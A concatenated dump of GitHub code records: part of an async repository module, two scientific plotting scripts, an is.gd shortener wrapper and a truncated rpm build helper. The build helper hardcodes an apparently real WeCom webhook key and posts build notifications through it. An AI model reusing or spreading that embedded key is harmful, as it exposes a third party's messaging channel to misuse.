loading portion.\n \"\"\"\n\n @job_getter\n async def info(self, job):\n async with await self.open(job, \"rb\") as fp:\n s = await fp.read()\n return yaml.safe_load(s)\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n s = yaml.safe_dump(data, None)\n async with await self.open(job, \"w\") as fp:\n await fp.write(s)\n\n\nclass YamlMetadataFileRepository(YamlMetadataRepository, FileRepository):\n \"\"\"\n A metadata repository based on a file blob repository.\n \"\"\"\n\n def __init__(self, filename, extension=\".yaml\", case_insensitive=False):\n super().__init__(filename, extension=extension, case_insensitive=case_insensitive)\n\n\nclass YamlMetadataS3Repository(YamlMetadataRepository, S3BucketRepository):\n \"\"\"\n A metadata repository based on a s3 bucket repository.\n \"\"\"\n\n def __init__(self, client, bucket, prefix, suffix=\".yaml\", mimetype=\"text/yaml\"):\n super().__init__(client, bucket, prefix, suffix=suffix, mimetype=mimetype)\n\n @job_getter\n async def info(self, job):\n try:\n return await super().info(job)\n except botocore.exceptions.ClientError as e:\n if \"NoSuchKey\" in str(e):\n return {}\n else:\n raise\n\n\nclass RelatedItemRepository(Repository):\n \"\"\"\n A repository which returns items from another repository based on following a related-item lookup.\n \"\"\"\n\n def __init__(\n self,\n base_repository: Repository,\n translator_repository: Repository,\n allow_deletes=False,\n prefetch_lookup=True,\n ):\n \"\"\"\n :param base_repository: The repository from which to return results based on translated keys. The resulting\n repository will duck-type as the same type as the base.\n :param translator_repository: A repository whose info() will be used to translate keys:\n ``info(job) == translated_job``.\n :param allow_deletes: Whether the delete operation on this repository does anything. If enabled, it will delete\n only from the base repository.\n :param prefetch_lookup: Whether to cache the entirety of the translator repository in memory to improve\n performance.\n \"\"\"\n self.base_repository = base_repository\n self.translator_repository = translator_repository\n self.allow_deletes = allow_deletes\n self.prefetch_lookup_setting = prefetch_lookup\n self.prefetch_lookup = None\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self.base_repository} by {self.translator_repository}>\"\n\n async def _lookup(self, item):\n if self.prefetch_lookup is None and self.prefetch_lookup_setting:\n self.prefetch_lookup = await self.translator_repository.info_all()\n if self.prefetch_lookup:\n return self.prefetch_lookup.get(item)\n else:\n return await self.translator_repository.info(item)\n\n async def contains(self, item):\n basename = await self._lookup(item)\n if basename is None:\n return False\n return await self.base_repository.contains(basename)\n\n async def delete(self, job):\n if not self.allow_deletes:\n return\n\n basename = await self._lookup(job)\n if basename is None:\n return\n\n await self.base_repository.delete(basename)\n\n @job_getter\n async def info(self, job):\n basename = await self._lookup(job)\n if basename is None:\n raise LookupError(job)\n\n return await self.base_repository.info(basename)\n\n def __getattr__(self, item):\n v = getattr(self.base_repository, item)\n if not getattr(v, \"is_job_getter\", False):\n return v\n\n async def inner(job, *args, **kwargs):\n basename = await self._lookup(job)\n if basename is None:\n raise LookupError(job)\n return await v(basename, *args, **kwargs)\n\n return inner\n\n async def unfiltered_iter(self):\n base_contents = {x async for x in self.base_repository}\n async for item in self.translator_repository:\n basename = await self._lookup(item)\n if basename is not None and basename in base_contents:\n yield item\n\n\nclass ExecutorLiveRepo(Repository):\n \"\"\"\n A repository where keys translate to running jobs in an ExecutorTask. This repository is constructed automatically\n and is linked as the ``live`` repository. Do not construct this class manually.\n \"\"\"\n\n def __init__(self, task: \"ExecutorTask\"):\n self.task = task\n\n def __repr__(self):\n return f\"<{type(self).__name__} task={self.task.name}>\"\n\n async def unfiltered_iter(self):\n for job in self.task.rev_jobs:\n yield job\n\n async def contains(self, item):\n return item in self.task.rev_jobs\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from the repository will cancel the corresponding task.\n \"\"\"\n await self.task.cancel(job)\n\n async def info(self, job):\n \"\"\"\n There is no templating info for an `ExecutorLiveRepo`.\n \"\"\"\n return None\n\n\nclass InProcessMetadataRepository(MetadataRepository):\n \"\"\"\n An incredibly simple metadata repository which stores all its values in a dict, and will let them vanish when the\n process terminates.\n \"\"\"\n\n def __init__(self, data: Optional[Dict[str, Any]] = None):\n self.data: Dict[str, Any] = data if data is not None else {}\n\n def __repr__(self):\n return f\"<{type(self).__name__}>\"\n\n @job_getter\n async def info(self, job):\n return self.data.get(job)\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n self.data[job] = data\n\n async def contains(self, item):\n return item in self.data\n\n async def delete(self, job):\n del self.data[job]\n\n async def unfiltered_iter(self):\n for job in self.data:\n yield job\n\n\nclass InProcessBlobStream:\n \"\"\"\n A stream returned from an `BlobRepository.open` call from `InProcessBlobRepository`. Do not construct this manually.\n \"\"\"\n\n def __init__(self, repo: \"InProcessBlobRepository\", job: str): # pylint: disable=missing-function-docstring\n self.repo = repo\n self.job = job\n self.data = io.BytesIO(repo.data.get(job, b\"\"))\n\n async def read(self, n: Optional[int] = None) -> bytes:\n \"\"\"\n Read up to ``n`` bytes from the stream.\n \"\"\"\n return self.data.read(n)\n\n async def write(self, data: bytes):\n \"\"\"\n Write ``data`` to the stream.\n \"\"\"\n self.data.write(data)\n\n async def close(self):\n \"\"\"\n Close and release the stream, syncing the data back to the repository.\n \"\"\"\n self.repo.data[self.job] = self.data.getvalue()\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.close()\n\n\nclass InProcessBlobRepository(BlobRepository):\n \"\"\"\n An incredibly simple blob repository which stores all its values in a dict, and will let them vanish when the\n process terminates.\n \"\"\"\n\n def __init__(self, data: Optional[Dict[str, bytes]] = None):\n self.data = data if data is not None else {}\n\n def __repr__(self):\n return f\"<{type(self).__name__}>\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n There is no templating info for an `InProcessBlobRepository`.\n \"\"\"\n return None\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n stream = InProcessBlobStream(self, job)\n if mode == \"r\":\n return AReadText(stream)\n elif mode == \"w\":\n return AWriteText(stream)\n else:\n return stream\n\n async def unfiltered_iter(self):\n for item in self.data:\n yield item\n\n async def contains(self, item):\n return item in self.data\n\n async def delete(self, job):\n del self.data[job]\n","repo_name":"rhelmot/pydatatask","sub_path":"pydatatask/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":39077,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"4158333907","text":"\"\"\"\nMaking Gouy-Chapman-Stern theory plots for introduction\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nimport matplotlib.transforms as mtransforms\n\nfrom edl import models\n\nrcParams[\"lines.linewidth\"] = 0.75\nrcParams[\"font.size\"] = 8\nrcParams[\"axes.linewidth\"] = 0.5\nrcParams[\"xtick.major.width\"] = 0.5\nrcParams[\"ytick.major.width\"] = 0.5\n\npotentials = np.linspace(-1, 1, 200)\n\nmodel = models.AqueousVariableStern(100e-3, 6, 6, 6, 6)\nsweep = model.potential_sweep(potentials, tol=1e-3)\n\nfig = plt.figure(figsize=(5, 2))\nax1 = fig.add_subplot(121)\nax2 = fig.add_subplot(122)\n\nax1.plot(\n sweep[\"phi0\"],\n sweep[\"charge\"] * 100,\n label=\"Cont.\",\n color=\"black\",\n)\nax2.plot(sweep[\"phi0\"], sweep[\"capacity\"] * 100, color=\"black\")\n\ncomsol_neg = np.loadtxt(\"comsol_data/70nm_nano_electrode_charge_neg.txt\")\ncomsol_pos = np.loadtxt(\"comsol_data/70nm_nano_electrode_charge_pos.txt\")\nchg_neg = comsol_neg[:, 1] / model.kappa_debye**2 / (35e-9) ** 2 / np.pi\nchg_pos = (\n (comsol_pos[:, 1] - comsol_pos[0, 1] + comsol_neg[0, 1])\n / model.kappa_debye**2\n / (35e-9) ** 2\n / np.pi\n)\nphi = np.concatenate([comsol_neg[::-1, 0], comsol_pos[:, 0]], axis=0)\nchg = np.concatenate([chg_neg[::-1], chg_pos], axis=0)\ncap = np.gradient(chg_neg[::-1], comsol_neg[::-1, 0])\n\nax1.plot(phi, chg, \"k--\", label=\"70nm\")\nax2.plot(comsol_neg[::-1, 0], cap, \"k--\")\nax1.set_xlim([-1, 1])\nax1.set_ylabel(r\"$\\sigma$ / $\\mu$C cm$^{-2}$\")\nax1.set_xlabel(r\"$\\phi_0$ / V\")\nax2.set_xlabel(r\"$\\phi_0$ / V\")\nax1.legend(frameon=False)\nax2.set_ylabel(r\"$C$ / $\\mu$F cm$^{-2}$\")\nax2.set_xlim([-1, 0])\nax2.set_ylim([0, 100])\n\nlabels = [\"(a)\", \"(b)\", \"(c)\", \"(d)\", \"(e)\", \"(f)\"]\nfor label, axis in zip(labels, fig.axes):\n # label physical distance to the left and up:\n trans = mtransforms.ScaledTranslation(-25 / 72, 10 / 72, fig.dpi_scale_trans)\n axis.text(\n 0.0,\n 1.0,\n label,\n transform=axis.transAxes + trans,\n fontsize=\"medium\",\n va=\"bottom\",\n )\n\nplt.tight_layout()\nplt.savefig(\"figures/comsol-cap.pdf\")\nplt.show()\n","repo_name":"lucasdekam/double-layer-modelling","sub_path":"plot_comsol_data.py","file_name":"plot_comsol_data.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35862450544","text":"\"\"\"\nPlots ribosome capacity\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom six.moves import cPickle\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport os\n\nfrom models.ecoli.analysis import singleAnalysisPlot\nfrom wholecell.analysis.analysis_tools import exportFigure\nfrom wholecell.analysis.analysis_tools import read_bulk_molecule_counts\nfrom wholecell.io.tablereader import TableReader\nfrom wholecell.utils import units\n\nFONT = {\n\t'size':\t8\n\t}\n\n\nclass Plot(singleAnalysisPlot.SingleAnalysisPlot):\n\tdef do_plot(self, simOutDir, plotOutDir, plotOutFileName, simDataFile, validationDataFile, metadata):\n\t\twith open(simDataFile, 'rb') as f:\n\t\t\tsim_data = cPickle.load(f)\n\n\t\t# Load data from KB\n\t\tnAvogadro = sim_data.constants.n_avogadro\n\n\t\t# Listeners used\n\t\tunique_molecules_reader = TableReader(os.path.join(simOutDir, \"UniqueMoleculeCounts\"))\n\t\tmain_reader = TableReader(os.path.join(simOutDir, \"Main\"))\n\t\tribosome_reader = TableReader(os.path.join(simOutDir, \"RibosomeData\"))\n\n\t\t# Get IDs of ribosome subunits\n\t\tribosome_subunit_ids = [\n\t\t\tsim_data.molecule_ids.s50_full_complex,\n\t\t\tsim_data.molecule_ids.s30_full_complex,\n\t\t\t]\n\n\t\t# Get masses of full ribosomes and subunits\n\t\tribosome_subunit_masses = sim_data.getter.get_masses(ribosome_subunit_ids)\n\t\tfull_ribosome_mass = units.sum(ribosome_subunit_masses)\n\n\t\t# Read time data\n\t\tinitial_time = main_reader.readAttribute(\"initialTime\")\n\t\ttime = main_reader.readColumn(\"time\") - initial_time\n\t\ttimeStep = main_reader.readColumn(\"timeStepSec\")\n\n\t\t# Calculate the elongation rate for the given condition\n\t\tnutrients = sim_data.conditions[sim_data.condition][\"nutrients\"]\n\t\telongation_rate = sim_data.process.translation.ribosomeElongationRateDict[nutrients].asNumber(units.aa/units.s)\n\n\t\t# Load ribosome data\n\t\tactual_elongations = ribosome_reader.readColumn(\"actualElongations\")\n\t\tactual_elongation_rate = actual_elongations / timeStep\n\n\t\t# Load counts of subunits and active ribosomes\n\t\t(ribosome_subunit_counts, ) = read_bulk_molecule_counts(\n\t\t\tsimOutDir, (ribosome_subunit_ids, ))\n\t\tactive_ribosome_index = unique_molecules_reader.readAttribute(\"uniqueMoleculeIds\").index('active_ribosome')\n\t\tactive_ribosome_counts = unique_molecules_reader.readColumn(\"uniqueMoleculeCounts\")[:, active_ribosome_index]\n\n\t\t# Calculate statistics\n\t\ttotal_ribosome_counts = active_ribosome_counts + ribosome_subunit_counts.min(axis=1)\n\t\ttotal_ribosome_capacity = total_ribosome_counts * elongation_rate\n\n\t\tfree_subunit_mass = (\n\t\t\t(ribosome_subunit_masses * ribosome_subunit_counts / nAvogadro).asNumber(units.fg)\n\t\t\t).sum(axis=1)\n\t\tactive_ribosome_mass = (full_ribosome_mass * active_ribosome_counts / nAvogadro).asNumber(units.fg)\n\t\ttotal_ribosome_mass = free_subunit_mass + active_ribosome_mass\n\t\tmass_fraction_active = active_ribosome_mass / total_ribosome_mass\n\n\t\tplt.figure(figsize = (8.5, 15))\n\t\tplt.rc('font', **FONT)\n\n\t\tribosomeCapacity_axis = plt.subplot(6,1,1)\n\t\tribosomeCapacity_axis.plot(\n\t\t\ttime / 60., total_ribosome_capacity,\n\t\t\tlabel=\"Theoretical total ribosome rate\", linewidth=2, color='b')\n\t\tribosomeCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate,\n\t\t\tlabel=\"Actual elongation rate\", linewidth=2, color='r')\n\t\tribosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tribosomeCapacity_axis.legend(ncol=2)\n\n\t\tactiveRibosomeCapacity_axis = plt.subplot(6,1,2)\n\t\tactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., active_ribosome_counts * elongation_rate,\n\t\t\tlabel=\"Theoretical active ribosome rate\", linewidth=2, color='b')\n\t\tactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate,\n\t\t\tlabel=\"Actual elongation rate\", linewidth=2, color='r')\n\t\tactiveRibosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tactiveRibosomeCapacity_axis.legend(ncol=2)\n\n\t\tinactiveRibosomeCapacity_axis = plt.subplot(6,1,3)\n\t\tinactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., ribosome_subunit_counts.min(axis=1) * elongation_rate,\n\t\t\tlabel=\"Theoretical inactive ribosome rate\", linewidth=2, color='b')\n\t\tinactiveRibosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tinactiveRibosomeCapacity_axis.legend(ncol=2)\n\n\t\tfractionalCapacity_axis = plt.subplot(6,1,4)\n\t\tfractionalCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate / total_ribosome_capacity,\n\t\t\tlinewidth=2, color='k')\n\t\tfractionalCapacity_axis.set_ylabel(\"Fraction of total ribosome capacity used\")\n\n\t\teffectiveElongationRate_axis = plt.subplot(6,1,5)\n\t\teffectiveElongationRate_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate / active_ribosome_counts,\n\t\t\tlinewidth=2, color='k')\n\t\teffectiveElongationRate_axis.set_ylabel(\"Relative elongation rate (aa/s/ribosome)\")\n\n\t\tfractionActive_axis = plt.subplot(6,1,6)\n\t\tfractionActive_axis.plot(\n\t\t\ttime / 60., mass_fraction_active,\n\t\t\tlinewidth=2, color='k')\n\t\tfractionActive_axis.set_ylabel(\"Mass fraction of active ribosomes\")\n\t\tfractionActive_axis.set_yticks(np.arange(0., 1.1, 0.1))\n\n\t\t# Save\n\t\tplt.tight_layout()\n\t\texportFigure(plt, plotOutDir, plotOutFileName, metadata)\n\t\tplt.close(\"all\")\n\n\nif __name__ == \"__main__\":\n\tPlot().cli()\n","repo_name":"CovertLab/WholeCellEcoliRelease","sub_path":"models/ecoli/analysis/single/ribosomeCapacity.py","file_name":"ribosomeCapacity.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"16"} +{"seq_id":"3633861828","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# is gd api wrapper\n\nimport urllib\nimport requests\n\nclass IsGd:\n \n API_URL = 'http://is.gd/api.php?longurl='\n \n def shorten(self,uri):\n resp = requests.get(self.API_URL+urllib.quote(uri), timeout=30)\n if resp:\n return resp\n else:\n return False","repo_name":"starenka/ara","sub_path":"isgd.py","file_name":"isgd.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29143123756","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n Authors:\n yifengyou <842056007@qq.com>\n\"\"\"\n\nimport argparse\nimport datetime\nimport glob\nimport json\nimport logging\nimport os\nimport os.path\nimport re\nimport subprocess\nimport sys\nimport time\nfrom logging.handlers import RotatingFileHandler\n\nimport requests\nimport select\n\nCURRENT_VERSION = \"0.1.0\"\nlogger = None\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H%M%S\")\nmsg_token = \"4155d89f-0b1c-44a8-8411-4f40c1d95795\"\n\n\ndef timer(func):\n def wrapper(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n elapsed = end - start\n logger.info(f\"{func.__name__} took {elapsed} seconds\")\n return result\n\n return wrapper\n\n\nclass Wecom():\n \"\"\"\n 企业微信群聊机器人,官方文档:https://developer.work.weixin.qq.com/document/path/91770\n \"\"\"\n\n def __init__(self, key=None):\n if key is None:\n raise Exception(\" wecom api key is None \")\n self._key = key\n\n def do_send(self, data):\n res = None\n headers = {'Content-Type': 'application/json'}\n url = f'https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={self._key}'\n r = requests.post(url=url, headers=headers, data=json.dumps(data))\n try:\n res = json.loads(r.text)\n except:\n pass\n if r.status_code == 200 and res and 'errcode' in res and 0 == res['errcode']:\n logger.info('* wecomBot send msg success')\n else:\n logger.info('* wecomBot send msg failed!')\n logger.info(r.text)\n\n def send_markdown(self, msg):\n data = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"content\": msg,\n },\n }\n self.do_send(data)\n\n\ndef init_logger(args):\n global logger, timestamp\n logger = logging.getLogger(\"mbuild\")\n console_handler = logging.StreamHandler(sys.stderr)\n console_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(name)s: %(message)s'))\n logger.addHandler(console_handler)\n logfile = os.path.join(args.workdir,\n \"mbuild_\" + timestamp\n )\n file_handler = RotatingFileHandler(\n filename=logfile,\n encoding='UTF-8',\n maxBytes=1024000,\n backupCount=10\n )\n file_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(name)s: %(message)s'))\n logger.addHandler(file_handler)\n logger.setLevel(logging.INFO)\n\n\ndef check_python_version():\n current_python = sys.version_info[0]\n if current_python == 3:\n return\n else:\n raise Exception('Invalid python version requested: %d' % current_python)\n\n\ndef do_exe_cmd(cmd, print_output=False, shell=False):\n stdout_output = ''\n stderr_output = ''\n if isinstance(cmd, str):\n cmd = cmd.split()\n elif isinstance(cmd, list):\n pass\n else:\n raise Exception(\"unsupported type when run do_exec_cmd\", type(cmd))\n\n # print(\"Run cmd:\" + \" \".join(cmd))\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell)\n while True:\n # 使用select模块,监控stdout和stderr的可读性,设置超时时间为0.1秒\n rlist, _, _ = select.select([p.stdout, p.stderr], [], [], 0.1)\n # 遍历可读的文件对象\n for f in rlist:\n # 读取一行内容,解码为utf-8\n line = f.readline().decode('utf-8').strip()\n # 如果有内容,判断是stdout还是stderr,并打印到屏幕,并刷新缓冲区\n if line:\n if f == p.stdout:\n if print_output == True:\n print(\"STDOUT\", line)\n stdout_output += line + '\\n'\n sys.stdout.flush()\n elif f == p.stderr:\n if print_output == True:\n print(\"STDERR\", line)\n stderr_output += line + '\\n'\n sys.stderr.flush()\n else:\n print(\"UNKOWN:\", line)\n if p.poll() is not None:\n break\n return p.returncode, stdout_output, stderr_output\n\n\ndef do_sendmsg(args, ret=0, stdout=\"\", stderr=\"\", extra=\"\"):\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : <font color=\\\"info\\\">{' '.join(sys.argv)}</font>\\n\" \\\n f\"返回值 : {ret}\\n\" \\\n f\"输出 : {stdout}\\n\" \\\n f\"错误 : {stderr}\\n\" \\\n f\"附加 : {extra}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\ndef handle_stat(args):\n pass\n\n\ndef rpmbuild_per_srpm(srpm):\n # 获取srpm名称 N-V-R\n ret, srpm_name, stderr = do_exe_cmd([\"rpm\", \"-qp\", \"--queryformat\", \"%{NAME}\", srpm], print_output=True)\n if ret != 0:\n logger.error(f\" query srpm file ret is not zero [{ret}] {stderr}\")\n return\n srpm_name = srpm_name.strip()\n logger.info(f\"srpm name : [{srpm_name}]\")\n\n # 创建构建目录\n topdir = os.path.dirname(srpm)\n mbuilddir = os.path.join(topdir, srpm_name)\n if not os.path.exists(mbuilddir):\n os.makedirs(mbuilddir, exist_ok=True)\n logger.info(f\"mbuild dir : {mbuilddir}\")\n rpmbuilddir = os.path.join(mbuilddir, \"rpmbuild_\" + timestamp)\n if not os.path.exists(mbuilddir):\n os.makedirs(rpmbuilddir, exist_ok=True)\n logger.info(f\"rpmbuild dir : {rpmbuilddir}\")\n\n ret, stdout, stderr = do_exe_cmd(\n [\"rpm\", \"-ivh\", \"--define\", f\"_topdir {rpmbuilddir}\", f\"{srpm}\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" install srpm {srpm} to {rpmbuilddir} failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_srpminstall_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n # 检查spec\n specs = glob.glob(f\"{rpmbuilddir}/SPECS/*.spec\")\n if len(specs) == 0:\n logger.error(f\"no specs found!\")\n return\n elif len(specs) > 1:\n logger.error(f\"found spec more than one [{len(specs)}]\")\n return\n spec = os.path.abspath(specs[0])\n logger.info(f\"using spec {spec}\")\n\n # 导出rpm -qa记录\n ret, stdout, stderr = do_exe_cmd([\"rpm\", \"-qa\"], print_output=False)\n if ret != 0:\n # logger.error(f\" query all rpm failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_rpmqa_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n rpm_manifest = os.path.join(mbuilddir, \"mbuild_rpm-manifest_\" + timestamp)\n with open(rpm_manifest, 'w') as fd:\n fd.write(stdout)\n\n # 安裝依赖\n ret, stdout, stderr = do_exe_cmd([\"yum\", \"builddep\", \"-y\", spec], print_output=True)\n if ret != 0:\n # logger.error(f\" yum builddep failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_builddep_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(mbuilddir, \"mbuild_builddep.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n\n # rpmbuild编译\n ret, stdout, stderr = do_exe_cmd(\n [\"rpmbuild\", \"--define\", f\"_topdir {rpmbuilddir}\", \"-ba\", f\"{spec}\", \"--nocheck\"],\n print_output=True)\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_build_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(mbuilddir, \"mbuild_rpmbuild.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n\n\n@timer\ndef handle_build(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if args.srpm and len(args.srpm) > 0:\n total = len(args.srpm)\n for index, srpm in enumerate(args.srpm):\n if not os.path.exists(srpm) or not os.path.isfile(srpm):\n logger.error(f\"{srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n rpmbuild_per_srpm(srpm_path)\n else:\n srpms = glob.glob(f\"{args.workdir}/*.src.rpm\")\n if not srpms:\n logger.error(f\"No src.rpm found in {args.workdir}\")\n exit(1)\n total = len(srpms)\n for index, srpm in enumerate(srpms):\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n rpmbuild_per_srpm(srpm_path)\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : <font color=\\\"info\\\">{' '.join(sys.argv)}</font>\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\n@timer\ndef handle_localinstall(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if not args.srpm:\n logger.error(f\" must specific target srpm\")\n\n if not os.path.exists(args.srpm) or not os.path.isfile(args.srpm):\n logger.error(f\"{args.srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(args.srpm)\n\n ret, stdout, stderr = do_exe_cmd(\n [\"rpm\", \"-ivh\", \"--define\", f\"_topdir {workdir}\", f\"{srpm_path}\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" install srpm {srpm} to {rpmbuilddir} failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_srpminstall_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n else:\n logger.info(f\"localinstall {srpm_path} success!\")\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : <font color=\\\"warning\\\">{' '.join(sys.argv)}</font>\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\n@timer\ndef handle_localbuild(args):\n \"\"\"\n 编译指定目录\n :param args:\n :return:\n \"\"\"\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n # 检查工作目录是否为rpmbuild目录(包含SOURCES、SPECS)\n if not os.path.exists(os.path.join(workdir, \"SOURCES\")) or not os.path.exists(os.path.join(workdir, \"SPECS\")):\n logger.error(f\"No SOURCES or SPECS dir found in {workdir}\")\n return\n\n # 检查spec,获取SPEC绝对路径spec\n specs = glob.glob(f\"{workdir}/SPECS/*.spec\")\n if len(specs) == 0:\n logger.error(f\"no specs found!\")\n return\n elif len(specs) > 1:\n logger.error(f\"found spec more than one [{len(specs)}]\")\n return\n spec = os.path.abspath(specs[0])\n logger.info(f\"using spec {spec}\")\n\n # 导出rpm -qa记录\n ret, stdout, stderr = do_exe_cmd([\"rpm\", \"-qa\"], print_output=False)\n if ret != 0:\n # logger.error(f\" query all rpm failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_rpmqa_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n rpm_manifest = os.path.join(workdir, \"mbuild_rpm-manifest_\" + timestamp)\n with open(rpm_manifest, 'w') as fd:\n fd.write(stdout)\n\n # 安裝依赖\n ret, stdout, stderr = do_exe_cmd([\"yum\", \"builddep\", \"-y\", spec], print_output=True)\n if ret != 0:\n # logger.error(f\" yum builddep failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_builddep_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(workdir, \"mbuild_builddep.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n # rpmbuild编译\n ret, stdout, stderr = do_exe_cmd(\n [\"rpmbuild\", \"--define\", f\"_topdir {workdir}\", \"-ba\", f\"{spec}\", \"--nocheck\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_build_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(workdir, \"mbuild_rpmbuild.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : <font color=\\\"info\\\">{' '.join(sys.argv)}</font>\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\ndef handle_clean(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n print(f\"workdir: {workdir}\")\n\n # 检查spec\n logs = glob.glob(f\"{workdir}/mbuild_*\")\n if len(logs) == 